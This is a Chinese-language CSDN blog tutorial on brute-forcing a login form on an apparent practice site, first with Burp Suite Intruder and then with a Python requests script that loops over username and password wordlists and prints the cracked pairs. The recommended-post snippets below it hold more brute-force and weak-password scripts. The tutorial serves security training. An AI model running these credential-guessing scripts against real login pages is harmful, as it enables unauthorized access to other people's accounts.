暴力破解用户名与密码(使用burp或python)

最新推荐文章于 2024-05-15 03:24:46 发布
最新推荐文章于 2024-05-15 03:24:46 发布
阅读量5.1k 收藏 23
点赞数 2
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/feiniaotjx/article/details/120297360
版权

暴力破解用户名与密码

靶机

实验地址:基于表单的暴力破解

1.随意输入用户名与密码。
在这里插入图片描述
2.通过burp抓包。
在这里插入图片描述3.将包发送到intruder,attact type改为cluster bomb,clear清除变量,再用add添加username和password变量。在这里插入图片描述
4.设置playload,playload类型设为simple list,将用户名字典用load导入,playload set 1为第一个参数,所以再将其设置成2,再导入密码字典,点击start attack开始攻击。
在这里插入图片描述
5.通过返回的长度判断,一般情况下长度不等的则破解成功,尝试了一番,length为57663的密码正确为admin 123456和test abc123在这里插入图片描述

还可以使用python的import模块

首先写一个可以实现用post提交用户名与密码

import requests

url = 'https://www.bihuoedu.com/vul/burteforce/bf_form.php'
post = {
    'username':'admin',
    'password':'123456',
    'submit':'Login'
}
data=requests.post(url,post)
if 'success' in data.text:
    print('ok')

ok

Process finished with exit code 0

再把字典加入其中

import requests

import requests

url = 'https://www.bihuoedu.com/vul/burteforce/bf_form.php'
for a in open('username.txt'):
    for b in open('password.txt'):
        aa=a.replace('\n','')
        bb=b.replace('\n','')
        post = {
            'username':aa,
            'password':bb,
            'submit':'Login'
        }
        data=requests.post(url,post)
        if 'success' in data.text:
            print(aa+'|'+bb+'|'+'ok')

admin|123456|ok
test|abc123|ok

Process finished with exit code 0
F。N 嘿嘿
关注
  • 2
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试,暴力破解,信息收集,BurpSuite、nmap工具使用.docx
12-05
内容:主要是渗透测试的基本知识点,比如信息收集、BurpSuite工具使用,sql注入等操作以及注意点的详细介绍; 适用:想学网络安全渗透测试知识的人; 场景:适合参加护网,保护网络安全,保护自己个人信息;
Content-Bruteforcing-Wordlist:使用Burp或dirsearch进行内容(目录)暴力破解的单词表
05-23
内容暴力词表 通过Burp Suite扩展Turbo Intruder发现内容(目录)暴力破解的单词列表 burp-wordlist.txt-大小:211236829-sha256sum:bbf3d3e0e94934b7dbb59d9b587fb0782b76b154584ead774e18e03c849bc01b wget "https://localdomain.pw/Content-Bruteforcing-Wordlist/burp-wordlist.txt?ver=211236829" -O burp-wordlist.txt 用法: 请参阅示例: turbo-intruder-example.py 使用Burp Suite扩展Turbo入侵者通过pipeline=True进行扫描
如何使用burpsuite爆破tomcat的账号和密码(有base64编码)_brupsuitpayload加上base64编码
最新发布
2401_85014241的博客
05-15 517
所以使用burpsuit爆破的思路就是,先从用户名爆破文件里面导入用户名,再在每一个用户名后面加一个冒号,最后再在每一个冒号后面添加所有可能的密码,再把这三个的结合体使用base64加密后发送给服务器,逐个尝试直到。所以很显然,结构就是。3.Posion选择1,点击下方的Clear,点击Load items from file,选择一个用户名爆破文件(网上找一个下载到本机)1.选择Positions,Attack type选择Sniper,选中使用base64加密过的那一段密文,点击右侧的Add$
Burp Suite——账号、密码爆破
2301_78006725的博客
03-09 584
burp上拦截登录请求,然后点击登录。选择需要爆破的系统,随便输入账号密码。登录之后返回burp查看拦截请求信息。开启代理(浏览器和burp需一致)
Brupsuit 暴力破解账户密码
weixin_43950973的博客
12-06 1124
burpsuit 实现http暴力破解
纯干货| 如何利用 Burp Suite 进行密码爆破
q—qun1150305204的博客
12-29 4356
使用 BP 工具的 Intruder 模块高度可配置,可以对目标网站进行密码爆破,一般被用于网站的安全渗透测试场景 它的工作原理是,在原始网络数据包中,利用不同的变量值对请求参数进行替换,然后模拟请求以获取不同的响应结果,以此达到爆破的目的 ​
burp跑字典,验证码破解4/6
YH,生活越来越好
05-16 5283
Burp Suite 是一种常用的网络安全测试工具,它可以通过暴力破解的方式来。如何使用 Burp Suite 进行呢?
BurpSuite爆破讲解
qq_43358922的博客
08-03 3842
一般而言,如果我们能够爆破成功,那么成功后反馈的页面和失败后反馈的页面一定是不同的。Intruder——是一个定制的高度可配置的工具,对web应用程序进行自动化攻击,如:枚举标识符,收集有用的数据,以及使用fuzzing 技术探测常规漏洞。Proxy——是一个拦截HTTP/S的代理服务器,作为一个在浏览器和目标应用程序之间的中间人,允许你拦截,查看,修改在两个方向上的原始数据流。Comparer——是一个实用的工具,通常是通过一些相关的请求和响应得到两项数据的一个可视化的“差异”。
Python实现账号和密码爆破登录并通过token的方式登录
jiet07的博客
09-02 1888
已知 password.txt 常用密码本 username.txt 常用用户名本 编写爆破账号和密码脚本,get_user&pass.py import requests def list_user_passwd(path_user,path_passwd):#将密码和用户保存到列表中 with open('path_user','r') as file: user=file.read() file.close() with open('path_passwd','r') as fi
burpsuite爆破用户名密码测试
09-06
使用wamp搭建测试渗透环境并用burpsuite暴破用户名密码 把群共享中的wamp.rar下载下来解压到C盘根目录,然后运行“wampmanager.exe”,点击右下角的图标,在弹出的菜单中选择Mysql->Service-安装服务。
burpsuite_1.7.36用户名密码暴力破解工具
10-30
burpsuite用户 用户名密码暴力破解,软件测试与post get请求分析
常用的用户名爆破字典
01-08
该资源是抓包时常用的用户名爆破字典,资源仅供学习参考使用,切勿用于非法用途,谢谢!
PHPMyAdmin弱口令猜解【Python脚本】
12-07 2236
PHPMyAdmin弱口令猜解 测试截图:  代码片段 #! /usr/bin/env python # _*_ coding:utf-8 _*_ import requests import time username_list=['root'] password_list=['root','','admin','123456','password'] def phpMyAdm...
pikachu——基于表单的暴力破解python解法
记录并分享学习安全的知识点..
01-17 398
代码如下: import re import requests with open('user.txt','r') as user: for username in user: #print (username.strip()) with open('password.txt','r') as passwd: for password in passwd: #print (password.strip()).
用Brup Suite爆破网站管理员用户名密码
longanquan的博客
08-03 3770
工具介绍 1、Brup Suite抓包工具(下面简称bp) 2、Firefox浏览器(Proxy Switcher代理) 3、自己在phpstudy上搭建的网站(不会的可以看前面的博客) Proxy Switcher代理可以直接在浏览器上下载 抓请求包 打开bp,打开Firefox浏览器,访问目标网站,进入管理员登录界面 开启代理 bp准备抓包(按图中操作) 浏览器访问 此时bp就抓到了这个请求包 将抓到的这个包发送到intruder模块 爆破 点进这个模块 然后做如下操作 添加字典(字典
Burp Suite暴力破解网站密码
热门推荐
m0_53820621的博客
11-22 1万+
一、准备: 1,靶场:个人选择DVWA。 2,工具:Burp Suite。 3,密码字典。 二、开搞!: 注:任何未经授权的渗透测试皆为违法,本文仅供学习,维护网络安全人人有责。 一、打开dvwa暴力破解页面: ...
burp密码暴力破解
weixin_42119967的博客
01-19 5026
准备工作: 1)安装好burp suite,不做详细介绍 附上,若双击启动无效,可以采用命令方式启动,命令如下: cd C:\Users\ASUS\Desktop\课程实训\bao\抓包分析\BS 说明:进入burp suite的所在文件夹 java -Xbootclasspath/p:burp-loader-keygen.jar -jar burpsuite_pro_v1.7.37.jar 说明:启动burpsuite 另启动jar命令:java -jar xxx.jar 说明:可以在安装时,
burpsuite爆破用户名密码例子
misiwole的博客
01-12 5187
之前攻防演练的时候,要寻找网站漏洞,因为之前也没有这方面的经验,所有做个记录吧,尝试了很多扫描软件,都被WAF拦下了,hydra的话不能绕开验证码而且必须爆破结束才能知道结果,burpsuite可以实时的看到爆破结果,这一点很不错,burpsuite的安装和浏览器的代理这里先不说了。另外,感觉网站入侵的第一步就是弱口令,之前攻击方的流程是这样子的:弱口令爆破得到登录账号–登录成功后找寻文件上传漏洞–通过文件上传漏洞上传webshell获取服务器权限–通过内网渗透到其他服务器(因为没有做隔离),从而获取了所有
实用 | 如何利用 Burp Suite 进行密码爆破!
AirPython的博客
06-07 875
大家好,我是安果!上一篇文章讲解了利用 Burp Suite 工具进行抓包、数据拦截修改的完整步骤推荐一款超棒的抓包分析工具 - Burp Suite本篇文章我们继续聊聊 BP 工具中一个实用的功能模块「Intruder 」使用 BP 工具的 Intruder 模块高度可配置,可以对目标网站进行密码爆破,一般被用于网站的安全渗透测试场景它的工作原理是,在原始网络数据包中...
简述使用burpsuite暴力破解的过程。
04-15
使用BurpSuite进行暴力破解的过程可以概括为以下几个步骤: 1. 配置代理: 在BurpSuite中配置代理,使其可以截取并修改客户端和服务器之间的流量。 2. 选择目标: 在BurpSuite中选择目标网站并加入目标范围。 3. 探测目标: 使用BurpSuite中的Intruder工具探测目标网站的漏洞,找到需要破解的用户名密码登录界面。 4. 配置payload: 使用字典文件或者手动设置payload,构建破解攻击的payload。 5. 破解攻击: 使用BurpSuite中的Intruder工具对目标网站进行暴力破解攻击,尝试破解对应的用户名密码。 6. 效果分析: 根据破解的结果分析攻击效果,并进行相关的后续操作。 需要说明的是,BurpSuite的使用需要遵守法律法规,不得用于非法用途。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值